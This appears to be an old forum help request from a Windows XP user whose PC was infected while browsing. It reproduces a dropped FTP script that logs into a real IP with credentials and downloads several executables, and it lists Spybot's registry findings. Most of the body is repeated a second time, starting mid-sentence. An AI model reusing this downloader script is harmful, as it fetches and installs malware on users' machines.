B
barb
I'm using windows XP. While I was browsing some site (not a porn
one..), suddenly my computer froze up. I disconnected from the
internet, and saw various files have been added to my computer. I
opened one of the files that got in, a file named 0 (in windowsא
system32), and got this:
open 207.58.159.14
tmpacct
12345
bin
get julie.exe
get newdevin.exe
get IF01.exe
get istinstall_154074.exe
get sd.exe
get sdmsg.exe
get TVM_B5.EXE
get 06wu29rd.exe
get dp807615.exe
bye
I tried to run Adaware, it froze halfway through, so I ran it again
and before it froze again I aborted, and was able to delete what it
found when I aborted–
Hkey_classes_root:CLSID\{5F1ABCDB-A875-46c1-8345-B72A4567E486}
After that, internet explorer wouldn't launch…
I ran Spybot, it found several problems, when I clicked the fix
problem button, it froze.
Now I cannot launch Internet Explorer – the whole computer freezes up.
I'm writing here using Netscape, and would really like to be able to
use my explorer again. HELP…. You're my only home practically…
How can I fix this? Should I change something in the registery?
BTW, the problems spybot found (which I'm unable to fix since the
program freezes) are:
Avenue A, Inc.: Tracking cookie (Internet Explorer: MYNAME) (Cookie,
nothing done)
BookedSpace: Browser helper object (Registry key, nothing done)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser
Helper Objects\{0019C3E2-DD48-4A6D-ABCD-8D32436323D9}
BookedSpace: Class ID (Registry key, nothing done)
HKEY_CLASSES_ROOT\CLSID\{0019C3E2-DD48-4A6D-ABCD-8D32436323D9}
BookedSpace: Root class (Registry key, nothing done)
HKEY_CLASSES_ROOT\BookedSpace.Extension.5
BookedSpace: Root class (Registry key, nothing done)
HKEY_CLASSES_ROOT\BookedSpace.Extension
BookedSpace: Settings (Registry key, nothing done)
HKEY_CLASSES_ROOT\AppID\BookedSpace.DLL
DSO Exploit: Data source object exploit (Registry change, nothing
done)
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\0\1004!=W=3
DSO Exploit: Data source object exploit (Registry change, nothing
done)
HKEY_USERS\S-1-5-21-2237029002-4258192708-1256799619-1004\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\0\1004!=W=3
DSO Exploit: Data source object exploit (Registry change, nothing
done)
HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\0\1004!=W=3
DSO Exploit: Data source object exploit (Registry change, nothing
done)
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\0\1004!=W=3
DSO Exploit: Data source object exploit (Registry change, nothing
done)
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\0\1004!=W=3
one..), suddenly my computer froze up. I disconnected from the
internet, and saw various files have been added to my computer. I
opened one of the files that got in, a file named 0 (in windowsא
system32), and got this:
open 207.58.159.14
tmpacct
12345
bin
get julie.exe
get newdevin.exe
get IF01.exe
get istinstall_154074.exe
get sd.exe
get sdmsg.exe
get TVM_B5.EXE
get 06wu29rd.exe
get dp807615.exe
bye
I tried to run Adaware, it froze halfway through, so I ran it again
and before it froze again I aborted, and was able to delete what it
found when I aborted–
Hkey_classes_root:CLSID\{5F1ABCDB-A875-46c1-8345-B72A4567E486}
After that, internet explorer wouldn't launch…
I ran Spybot, it found several problems, when I clicked the fix
problem button, it froze.
Now I cannot launch Internet Explorer – the whole computer freezes up.
I'm writing here using Netscape, and would really like to be able to
use my explorer again. HELP…. You're my only home practically…
How can I fix this? Should I change something in the registery?
BTW, the problems spybot found (which I'm unable to fix since the
program freezes) are:
Avenue A, Inc.: Tracking cookie (Internet Explorer: MYNAME) (Cookie,
nothing done)
BookedSpace: Browser helper object (Registry key, nothing done)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser
Helper Objects\{0019C3E2-DD48-4A6D-ABCD-8D32436323D9}
BookedSpace: Class ID (Registry key, nothing done)
HKEY_CLASSES_ROOT\CLSID\{0019C3E2-DD48-4A6D-ABCD-8D32436323D9}
BookedSpace: Root class (Registry key, nothing done)
HKEY_CLASSES_ROOT\BookedSpace.Extension.5
BookedSpace: Root class (Registry key, nothing done)
HKEY_CLASSES_ROOT\BookedSpace.Extension
BookedSpace: Settings (Registry key, nothing done)
HKEY_CLASSES_ROOT\AppID\BookedSpace.DLL
DSO Exploit: Data source object exploit (Registry change, nothing
done)
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\0\1004!=W=3
DSO Exploit: Data source object exploit (Registry change, nothing
done)
HKEY_USERS\S-1-5-21-2237029002-4258192708-1256799619-1004\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\0\1004!=W=3
DSO Exploit: Data source object exploit (Registry change, nothing
done)
HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\0\1004!=W=3
DSO Exploit: Data source object exploit (Registry change, nothing
done)
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\0\1004!=W=3
DSO Exploit: Data source object exploit (Registry change, nothing
done)
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\0\1004!=W=3